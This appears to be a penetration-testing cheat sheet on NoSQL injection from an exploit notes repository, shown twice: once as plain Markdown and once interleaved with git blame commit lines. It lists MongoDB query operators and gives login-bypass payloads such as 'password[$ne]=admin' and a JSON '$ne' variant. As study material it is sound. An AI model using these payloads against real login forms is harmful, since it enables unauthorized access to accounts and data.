killchain-compendium/Exploits/Databases/NoSQL Injection.md

# NoSQL Injections

* No tables, but files (collections)
* Examples are Elasticsearch, MongoDB, Redis, CouchDB.

## Querying

* Filter instead of SQL queries
* [Redis docs](https://redis.io/documentation)
* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
* [Elasticsearch docs](https://www.elastic.co/guide/index.html)

## Operators

* A precondition to the injection is to know the most common operators listed below
```sql
$and
$or
$eq
$ne
$gt
$where
$exists
$regex
```

## Injection

The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server.

* Pass HTTP parameter as an array instead of `user=` and `password=` use 
```sh
user[$operator]=foo&password[$operator]=bar
```

* Give a 2D array a chance as well while fiddling with the request in following way
```sh
user[$nin][]=foo
```

### Examples

* POST or GET parameters
```sh
username=admin&password[$ne]=admin
```

* JSON
```json
{"username":"user","password":{"$ne":""} }
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# NoSQL Injections`

			`* No tables, but files (collections)`
			`* Examples are Elasticsearch, MongoDB, Redis, CouchDB.`

			`## Querying`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Exploits 2022-11-13 22:38:01 +01:00			`* Filter instead of SQL queries`
			`* [Redis docs](https://redis.io/documentation)`
			`* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)`
			`* [Elasticsearch docs](https://www.elastic.co/guide/index.html)`

NoSQL update 2022-11-13 23:54:35 +01:00			`## Operators`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
NoSQL update 2022-11-13 23:54:35 +01:00			`* A precondition to the injection is to know the most common operators listed below`
restructured Exploits 2022-11-13 22:38:01 +01:00			```sql
			`$and`
			`$or`
			`$eq`
			`$ne`
			`$gt`
			`$where`
			`$exists`
			`$regex`
			```

NoSQL update 2022-11-13 23:54:35 +01:00			`## Injection`
restructured Exploits 2022-11-13 22:38:01 +01:00
NoSQL update 2022-11-13 23:54:35 +01:00			`The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server.`

			* Pass HTTP parameter as an array instead of `user=` and `password=` use
			```sh
			`user[$operator]=foo&password[$operator]=bar`
			```

			`* Give a 2D array a chance as well while fiddling with the request in following way`
			```sh
			`user[$nin][]=foo`
			```

			`### Examples`
restructured Exploits 2022-11-13 22:38:01 +01:00
			`* POST or GET parameters`
			```sh
			`username=admin&password[$ne]=admin`
			```
NoSQL update 2022-11-13 23:54:35 +01:00
restructured Exploits 2022-11-13 22:38:01 +01:00			`* JSON`
			```json
			`{"username":"user","password":{"$ne":""} }`
			```